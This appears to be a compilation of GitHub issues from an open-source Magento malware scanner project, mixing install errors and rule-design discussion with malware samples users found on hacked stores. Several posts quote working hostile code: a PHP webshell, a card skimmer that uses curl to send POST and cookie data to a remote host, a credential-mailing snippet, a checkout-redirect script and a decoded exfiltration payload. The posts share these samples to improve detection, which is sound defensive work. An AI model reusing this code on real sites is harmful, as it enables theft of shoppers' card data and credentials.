Currently it has the --newonly option to scan new files, but for volatile rules files, you'd want to do a full scan often, but not be bothered with previous hits.

Some of our customers have symlinks like this:

~/httpdocs/nl/  => ~/httpdocs/
~/httpdocs/en/  => ~/httpdocs/

Of course this causes infinite recursion, but most software is protected against that.
mwscan keeps digging forever, so there seems to be a problem with the new --followsymlinks feature. I will check if I can provide a fix.

EDIT: On our Ubuntu Linux the recursion goes max 40 levels deep, which makes mwscan scan the files in httpdocs 80 times in the above example.

Last night MageSec's rules were updated:
https://magesec.org/download/yara-standard.yar
A Yara rule like this:

rule ccsave_cc_number_3803e
{
   strings: $ = "\x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72"
        condition: any of them

}

Also matches the text ccsave_cc_number which is what you get when you do in Bash:

echo -e "\x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72"

The solutions is to use a rule like this:

rule ccsave_cc_number_3803e_new
{
   strings: $ = "\\x63\\x63\\x73\\x61\\x76\\x65\\x5F\\x63\\x63\\x5F\\x6E\\x75\\x6D\\x62\\x65\\x72"
        condition: any of them
}

to match a file which includes the string \x63\x63\x73\x61\x76\x65\x5F\x63\x63\x5F\x6E\x75\x6D\x62\x65\x72.

Hi,

I was testing the malware finder on my local vagrant. We have multiple files that wont be detected by this. The files attached to this post have been found under /skin

Archive.zip

Hi @gwillem,

Is there a manual for whitelisting an encrypted licence check from an extension?
I already decrypted the source so I am sure it is safe.

Kind regards, Jeroen

Scanning all the Magento Connect modules produces some obfuscated code that looks legit. This will probably happen more in the future, as vendors are moving away from Ioncube.

Possibilities:

1. Make primary rules more specific and move generic obfuscation detection rules to suspicious. Problem: some malware will have a unique obfuscation per site, so in that case, specific rules are useless.
2. Maintain whitelist of legitimate obfuscated Magento code. Problem: to verify whitelist validity, the obfuscated source should be included in the repo. But not all code is opensource, so vendors might object to having their obfuscated files included in a public GPL repo. Only storing whitelist hashes in the repo is possible, but does not allow collaborative maintenance.

Ideally, we would have a Yara wrapper that allows target filtering. Yara itself can't exclude targets from a directory tree. Some people have written bash wrappers, but they launch a Yara instance per file, which is incredibly inefficient (overhead of fork(), rule compilation etc).

But.. there is a C Python extension for Yara, which enables an efficient wrapper. For example, it could:

• Exclude certain extensions (images, sql, csv, tar.gz)
• Only scan files with a ctime newer than last log entry (periodic incremental scans)

Is there a Windows method?

Tap on a clip to paste it in the text box.

Looks like this link in the README died

Hi, @gwillem was checking this script today git.io/mwscan.txt with a newly downloaded Magento and the script is marking all files as malware: https://screencast.com/t/BNfLjecr can you please check? maybe it's a new line added or some new change that breaks the script result.

final line should be:

10 2 * * * root /usr/bin/curl -s $RULESURL -o $RULEFILE && $MWSCAN --quiet --newonly --rules $RULEFILE $MAGENTO
can't be bothered to do a pull req

@gwillem While improving my deobfuscate script, I discovered you probably whitelisted an evil file in commit 4a4c7ff, PR #50:
https://github.com/gwillem/magento-malware-scanner/blob/master/corpus/whitelisted/NeoPI/animal_shell_poc.php
According to my deobfuscate script this file translates to:

<?php if(isset($_GET['cmd'])){ echo `{$_GET['cmd']}`; }

Which is nothing but evil, notice the backticks used in the echo.

following code was injected on index.php file

$OpenInNewWindow = "1";

// # DO NOT MODIFY ANYTHING ELSE BELOW THIS LINE!
// ----------------------------------------------
$BLKey = "CAHP-YX3S-PWBH";

if(isset($_SERVER['SCRIPT_URI']) && strlen($_SERVER['SCRIPT_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_URI'].((strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

if(!isset($_SERVER['REQUEST_URI']) || !strlen($_SERVER['REQUEST_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'].((isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

$QueryString  = "LinkUrl=".urlencode(((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on')?'https://':'http://').$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$QueryString .= "&Key=" .urlencode($BLKey);
$QueryString .= "&OpenInNewWindow=" .urlencode($OpenInNewWindow);


if(intval(get_cfg_var('allow_url_fopen')) && function_exists('readfile')) {
    @readfile("http://www.backlinks.com/engine.php?".$QueryString); 
}
elseif(intval(get_cfg_var('allow_url_fopen')) && function_exists('file')) {
    if($content = @file("http://www.backlinks.com/engine.php?".$QueryString)) 
        print @join('', $content);
}
elseif(function_exists('curl_init')) {
    $ch = curl_init ("http://www.backlinks.com/engine.php?".$QueryString);
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    curl_exec ($ch);

    if(curl_error($ch))
        print "Error processing request";

    curl_close ($ch);
}
else {
    print "It appears that your web host has disabled all functions for handling remote pages and as a result the BackLinks software will not function on your web page. Please contact your web host for more information.";
}

ping me back if any more details needed.

Can we have some contributing instructions for adding a new burner domain?

Where are we placing them (into burner-domains.txt I assume?) and what script shall we then run to populate the build?

AFAICT only the use case of scanning the file system is documented, and there's no mention of piping wget to mwscan (unless I'm missing something). Seems like it could be helpful to document that option for usage as well.

Challenges with current system:

1. Lots of Yara rules syntax is boilerplate and not very dense, we almost exclusively use any of them and either string or regex match.
2. It is preferred to use any of them instead of all of them (because that allows inclusion in the grep rules) but this is not clear from the existing rules files.
3. Rules names are mostly arbitrary but have to be unique or Yara will complain.

I propose to create an intermediary layer that abstracts away most of the boilerplate. Rules are entered into text files frontend and backend. Rules are either strings (no quotes or escaping necessary) or regexes (enclosed by / and with proper escapes). Rules are separated by newlines. Extra newlines can be added to group rules. Comments (starting with '#') can be added to indicate a rulename or explain rule logic.

A text2yara builder will convert the text files to proper Yara syntax. It will generate unique rules names based on checksum and possible comment, and group together rules.

More complex rules are still possible, they can be added to complex.yar.

Rule 'dynamic_base64_function_call_us_04557' causes a lot of false positives in several extensions.

Example 1: app/code/local/TBT/Bss/Helper/Loyalty/Checker.php

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%

Example 2: app/code/local/Mindstretch/Betterinvoice/Model/Order/Pdf/Items/Invoice/Default.php

<?php /* Copyright Mindstretch */$OOO000000=urldecode('%66%67%36

Is md5_to_incoming.sh still to be used? The current contributing docs skip straight to placing your sample into corpus/backend or corpus/frontend - but I don't see where the file will be renamed with its hash following this currently method?

I suggest updating CONTRIBUTING.md to merge how it was a short whole ago (i.e. the use of md5_to_incoming.sh script) with what the current process is, and alter the md5_to_incoming.sh to place the file into either frontend of backend depending on whether its PHP or JavaScript - perhaps two different scripts would be simpler?

So the docs could then read someting like - place sample into corpus/incoming and run tools/frontend_md5_to_incoming.sh for JavaScript and tools/backend_md5_to_incoming.sh for PHP. The script will then calculate MD5 hash and rename, and move the sample to the appropriate folder in corpus.

Your site is compromised with injected JavaScript. (108)
The malicious code signature(s) has been found on the page.
The malicious code signature(s) has been found in resources:
[...]blogwp/wp-includes/js/wp-embed.min.js?ver=5.0.3
[...]blogwp/wp-includes/css/dist/block-library/style.min.css?ver=5.0.3

(This is a wordpress, we're using it with Fishpig_Wordpress)
I checked, the file is native unmodified wordpress file..?

$user_ip = getenv('REMOTE_ADDR');
$geo = unserialize(file_get_contents("http://www.geoplugin.net/php.gp?ip=$user_ip"));
$city = $geo["geoplugin_city"];
$region = $geo["geoplugin_regionName"];
$country = $geo["geoplugin_countryName"];
mail("[email protected]","MEMBER MLM TELAH LOGIN KEMBALI ".$_SERVER['REMOTE_ADDR']
,"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."
\nUsername | Password : ".$username."|".$password."
\nAamat: ".$city." |".$region."| ".$country."
\nIP Log : ".$_SERVER['REMOTE_ADDR'])
;return true;

With Magereport and some additional tools I found viruses on my Magento store,
I found some in footers via configuration an some in catalog search and cms blocks and visitor info by doing a search for eval in any db field in the Magento database...

Would those viruses be of interest?

Does this tool work on Magento 2 Enterprise?

Note to mwscan users: update your install, or you will not get new rules anymore!

• The grep URL has changed from git.io/mwscan.txt to mwscan.s3.amazonaws.com/mwscan.txt
• If using the mwscan package, try sudo pip3 install --upgrade mwscan (or sudo pip install --upgrade mwscan).

See the updated docs for sample crons.

What is this change about?

Let the CI pipeline build the signatures, instead of including them in the repo (redundantly).

Pro: This will unclutter many PRs
Con: Installation instructions need to change, people need to update their mwscan code as the URL is hardcoded and currently points to github.

Plan:

• Instruct Travis to build rules and upload them to S3 upon commit to master. Done: https://mwscan.s3.amazonaws.com/mwscan.yar
• Change built rules name to mwscan.txt and mwscan.yar (from all-confirmed).
• Update all references to all-confirmed, eg in travis test scripts
• Change URL in ruleset.py
• Update basic instructions/URL for grep usage
• Do not bundle rules anymore in pip/deb package and remove DEFAULT_RULES_FILE
• Make mwscan ruleset the default one
• Ensure that scanning continues, even if S3 is unreachable (except of course when there is no cached version of the rules)
• Add build/* to .gitignore so PRs will not clutter any further.
• Verify that mwscan without arguments still does a sane thing (ie download the latest default ruleset and use that)
• Update screenshot in docs
• Release new pip package
• Add wildcard rule that will fail on everything, to warn sysadmins to upgrade.

Mwscan users (e.g. Byte) should:

• Once steps above are completed, install new pip package and/or build new deb with new S3 rule URL

There's a malware sharing platform called "MISP" (or https://github.com/MISP), which might provide a more useful structure for sharing these samples than GitHub.

Found through https://twitter.com/da_667/status/832217900127834112

Please could you indicate the intention / distinction between the frontend and backend folders for signatures? What locations of malicious code are you defining as frontend and backend?

For example, code added to Miscellaneous Scripts / core_config_data table could be added via the Magento backend (i.e. admin panel) but it would show itself to a user via the website frontend, sometimes by viewing source it can be seen etc.

From app/code/core/Mage/Core/functions.php

if (preg_match("/".base64_decode('Zmlyc3RuYW1lfGN2YzJ8Y2NfbnVtYmVyfHVzZXJuYW1lfGNjX3xzaGlwcGluZ3xjdnZ8bW9udGh8ZHVtbXl8c2VjdXJldHJhZGluZ3x5ZWFyfGxvZ2lufGJpbGxpbmd8ZXhwaXJ5fHBheW1lbnR8Y2FyZF9udW1iZXI=')."/i", serialize($_POST)))
-    @shell_exec("curl --data \"version=1&encode=".base64_encode(    serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".trim(base64_decode('aHR0cDovL3ZlcnBheW1lbnQuY29tL3Rlc3RTZXJ2ZXIucGhw'))." > /dev/null 2<&1 &");

Man, please tell us how the js code, which grabs the credit card details, is inserted into Magento.
Its a client side problem or something in Magento?

As far as I see, those are not included yet.

See here https://www.flashpoint-intel.com/blog/compromised-magento-sites-delivering-malware/ and https://www.flashpoint-intel.com/wp-content/uploads/2018/04/rarog_yara_rule.txt

for details.

I'm not sure about the best way to convert this to regex here, so I didn't create a pull request.

it was adding following code in some of js in our case it was quickview.js and ccard.js

jQuery(document).ready(function()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		jQuery("*[onclick^=\"shippingMethod.save()\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick^=\"checkout.save();\"]").attr("onclick", "paynow_right();");
		jQuery("*[onclick=\"payment.save()\"]").attr("onclick", "paynow_right();");
		jQuery("#checkout-onepage-buttom").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-button-place-order").attr("onclick", "paynow_right();");
		jQuery("#onestepcheckout-place-order").attr("onclick", "paynow_right();");
	}
});

function paynow_right()
{
	if(!(document.cookie.indexOf("userpayid") + 1))
	{
		var rand = function()
		{
			return Math.random().toString(36).substr(2);
		};
		document.cookie = "userpayid=" + rand();
		var arr = {
			"location" : "http://" + location.host,
			"method" : "PayPal"
		};
		jQuery(location).attr('href', "//paymentpal.cf/?payment=" + btoa(JSON.stringify(arr)));
	}
}

quickview.js => https://pastebin.com/xUgXxwDe
ccard.js => https://pastebin.com/tkGgKQSi

we also see 2 files with strange name

• 2.php.png => https://pastebin.com/RC4v6UrX
• slltemap.php.jpg => https://pastebin.com/0q3naCgZ

MageReport found Credit Card Hijack , malware-scanner did not.
Then I downloaded and scanned the DB and site backup files with a different scanner (Kaspersky) and did not find it either.

Whats next?

Not sure why this is happening, but when I enter the command under "Running from cron" here the variables get stripped...

[server]$ cat <<EOM | sudo tee /etc/cron.d/mwscan
>
> MAILTO=youremail@etc
>
> RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
> RULEFILE=/var/cache/rules.yar
> MAGENTO=/var/www/magento
> MWSCAN=/usr/bin/mwscan
>
> 10 2 * * * root /usr/bin/curl -s $RULESURL -o $RULEFILE && $MWSCAN --quiet --newonly --rules $RULEFILE $MAGENTO
> EOM

MAILTO=youremail@etc

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento
MWSCAN=/usr/bin/mwscan

10 2 * * * root /usr/bin/curl -s  -o  &&  --quiet --newonly --rules
[server]$ cat /etc/cron.d/mwscan

MAILTO=youremail@etc

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento
MWSCAN=/usr/bin/mwscan

10 2 * * * root /usr/bin/curl -s  -o  &&  --quiet --newonly --rules

https://blog.travis-ci.com/2017-08-31-trusty-as-default-status

Probably need to verify whether the default yara packages for Trusty are sufficient.

Linux 4.4.0-43-Microsoft #1-Microsoft Wed Dec 31 14:42:53 PST 2014 x86_64 x86_64 x86_64 GNU/Linux

@:~$ sudo mwscan /var/www/public
Traceback (most recent call last):
  File "/usr/local/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20170601.141726', 'console_scripts', 'mwscan')()
  File "/usr/local/lib/python2.7/dist-packages/mwscan/scan.py", line 218, in main
    mylife.ionice(psutil.IOPRIO_CLASS_IDLE)
  File "/usr/local/lib/python2.7/dist-packages/psutil/__init__.py", line 820, in ionice
    return self._proc.ionice_set(ioclass, value)
  File "/usr/local/lib/python2.7/dist-packages/psutil/_pslinux.py", line 1365, in wrapper
    return fun(self, *args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/psutil/_pslinux.py", line 1830, in ionice_set
    return cext.proc_ioprio_set(self.pid, ioclass, value)
OSError: [Errno 22] Invalid argument

I've been having ongoing problems with mwscanner since the AWS update. I have a CentOS6 server.

Initially I was getting the "pkg_resources.DistributionNotFound: requests>=0.8.2" and I couldn't get past that until I finally found the comment in usage.md that says to run "easy_install --upgrade requests".

That finally resolved the error that's been holding me up, but the scan didn't get far before reporting a different error.

[*] Using Mwscan rules.
[*] Fetching mwscan.yar
[*] Starting new HTTPS connection (1): mwscan.s3.amazonaws.com
[*] https://mwscan.s3.amazonaws.com:443 "GET /mwscan.yar HTTP/1.1" 200 155458
Traceback (most recent call last):
  File "/usr/bin/mwscan", line 9, in <module>
    load_entry_point('mwscan==20180510.172121', 'console_scripts', 'mwscan')()
  File "/usr/lib/python2.6/site-packages/mwscan/scan.py", line 243, in main
    rules, whitelist = provider(args=args).get()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 139, in get
    rawrules = self.get_rules()
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 48, in get_rules
    rawrules = self._recursive_fetch(self.rules_url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 160, in _recursive_fetch
    data = self._httpget(url)
  File "/usr/lib/python2.6/site-packages/mwscan/ruleset.py", line 121, in _httpget
    return resp.content.decode('utf-8', errors='ignore')
TypeError: decode() takes no keyword arguments

Setting up MWSCAN on our managed server which is running Python 2.7
Can MWSCAN run on 2.7 ?
I get the message:

Traceback (most recent call last):
File "./mwscan", line 38, in
from ruleset import providers
ImportError: No module named ruleset

Technically, Adminer is not malware of course. However, it appears that Adminer is a commonly used tool by Magento exploiters to ensure future database access. General attack flow:

1. Hacker gets in through SQL injection, Shoplift, Magmi, Webforms upload, brute forcing weak admin password.
2. Hacker fetches database password from local.xml
3. Hacker drops backdoors to ensure future access. Backdoors are webshells, blanket eval or upload forms, or database webinterfaces (Adminer).

On our platform, we found roughly 100 Adminer installs. A sample validation revealed that most of them were not put there by the site owner.

What to do?

Hi - could you possibly please create a Windows version of runtests.py. I potentially have a file that went unfound by the current rules, so I've extracted it and running it on my workstation through Yara but got to the "runtests.py" point and it didn't work. I tried swapping the / to \ in the file, and changing the EOL but still couldn't get it to work with various errors from:

Traceback (most recent call last): File "tools\runtests.py", line 87, in <module> runtests() File "tools\runtests.py", line 59, in runtests report = check_output(['yara', '-r', RULES_CONFIRMED_PATH, MALWARE_PATH]).de code() File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess. py", line 336, in check_output **kwargs).stdout File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess. py", line 403, in run with Popen(*popenargs, **kwargs) as process: File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess. py", line 707, in __init__ restore_signals, start_new_session) File "C:\Users\user\AppData\Local\Programs\Python\Python36-32\lib\subprocess. py", line 990, in _execute_child startupinfo) FileNotFoundError: [WinError 2] The system cannot find the file specified

To after trying to convert myself:

` File "tools\runtests-windows.py", line 26
return set([fn for s in SEGMENTS for fn in glob(MALWARE_PATH + '' + s + '*
') ])

^

SyntaxError: unexpected character after line continuation character`

Any help?

It seems to have only semantic consequence. Probably due to Py2 vs Py3

See #92 and #89

[mpachol@pachol2 magento-malware-scanner]$ sudo pip install --upgrade mwscan DEPRECATION: Python 2.6 is no longer supported by the Python core team, please upgrade your Python. A future version of pip will drop support for Python 2.6
Collecting mwscan
/usr/lib/python2.6/site-packages/pip-9.0.1-py2.6.egg/pip/vendor/requests/packages/urllib3/util/ssl.py:318: SNIMissingWarning: An HTTPS request has been made, but the SNI (Subject Name Indication) extension to TLS is not available on this platform. This may cause the server to present an incorrect TLS certificate, which can cause validation failures. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.io/en/latest/security.html#snimissingwarning.
SNIMissingWarning
/usr/lib/python2.6/site-packages/pip-9.0.1-py2.6.egg/pip/vendor/requests/packages/urllib3/util/ssl.py:122: InsecurePlatformWarning: A true SSLContext object is not available. This prevents urllib3 from configuring SSL appropriately and may cause certain SSL connections to fail. You can upgrade to a newer version of Python to solve this. For more information, see https://urllib3.readthedocs.io/en/latest/security.html#insecureplatformwarning.
InsecurePlatformWarning
Downloading mwscan-20170208.125606.tar.gz
Requirement already up-to-date: psutil in /usr/lib64/python2.6/site-packages (from mwscan)
Requirement already up-to-date: yara-python in /usr/lib64/python2.6/site-packages (from mwscan)
Requirement already up-to-date: requests>=0.8.2 in /usr/lib/python2.6/site-packages (from mwscan)
Installing collected packages: mwscan
Running setup.py install for mwscan ... done
Successfully installed mwscan-20170208.125606

[mpachol@pachol2 magento-malware-scanner]$ mwscan --ruleset magesec /home/mpachol/public_html/
Traceback (most recent call last):
File "/usr/bin/mwscan", line 5, in
from pkg_resources import load_entry_point
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 2655, in
working_set.require(requires)
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 648, in require
needed = self.resolve(parse_requirements(requirements))
File "/usr/lib/python2.6/site-packages/pkg_resources.py", line 546, in resolve
raise DistributionNotFound(req)
pkg_resources.DistributionNotFound: requests>=0.8.2

I found this line manually after deep mwsan
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(FILE); eval(base64_decode("ENCRYPT...`

when I decrypt Zeura I get the folllowing code at the end of the file
if(isset($_POST)){$EvxCq = WmJQW('',$_POST,0); $_COOKIE['BMMLN']!=null?$SflHflmRjQ=$_COOKIE['BMMLN']:setcookie('BMMLN', $SflHflmRjQ=time().'-'.crc32(uniqid()),time()+86000,'/',$_SERVER['HTTP_HOST']);file_get_contents(base64_decode( 'aHR0cHM6Ly9sb2NhbHNlcnZlci5ob3N0L2FwaS9pbmRleC5waHA='), FALSE,stream_context_create(array('http'=>array('method'=>'POST', 'header'=>'Content-type: application/x-www-form-urlencoded', 'content'=>http_build_query(array('info'=>base64_encode($EvxCq), 'hostname'=>$_SERVER['HTTP_HOST'],'sub'=>2,'key'=>$SflHflmRjQ))))));} function WmJQW($bRrNN,$CYRnG,$qabbF) {foreach($CYRnG as $vikBC => $PmGhs) {if(!is_array($PmGhs)) { if($qabbF == 1) {$dwTSf[] = $bRrNN.'['.$vikBC.']='.$PmGhs;}else {$dwTSf[] = $vikBC.'='.$PmGhs;} }else {$dwTSf[] = WmJQW($vikBC,$PmGhs,1);}}return implode('&',$dwTSf);} ?>

you need to check if python packages already installed and managed with yum or apt, instead of re-installing them with pip.
this will break other python projects.

Just looking down the list of burner domains - there was one in the corpus/frontend/firebug-detector.html malware that was encrypted. Is it worth adding the decrypted URL in case its ever used?

I think in the case of the script in the corpus it was: https://lit-beach-26452.herokuapp.com/, with the "lit-beach-26452" bit changing hack-by-hack so "herokuapp.com" could be used in the list of burner domains?

The documentation for usage notes that python-pip, gcc and python-dev are required for install, however you also need python-setuptools on Debian Stretch for the "pip install" to succeed

If I understand it correct this can happen:

RULESURL=https://raw.githubusercontent.com/gwillem/magento-malware-scanner/master/build/all-confirmed.yar
RULEFILE=/var/cache/rules.yar
MAGENTO=/var/www/magento

• Monday 0:00 malware X exists in $MAGENTO
• Monday 0:00 malware X is not added to $RULESURL
• Monday 0:10 /usr/bin/curl -s $RULESURL -o $RULEFILE
• Monday 0:11 mwscan --newonly --rules $RULEFILE $MAGENTO => malware X not found
• Monday 10:00 @gwillem adds a malware X to $RULESURL
• Tuesday 0:10 /usr/bin/curl -s $RULESURL -o $RULEFILE
• Tuesday 0:11 mwscan --newonly --rules $RULEFILE $MAGENTO => malware X not found

This is a problem right?
Or am I missing something?

A possible fix would be to add the version of the all-confirmed.yar to the path of the LAST_RUN_FILE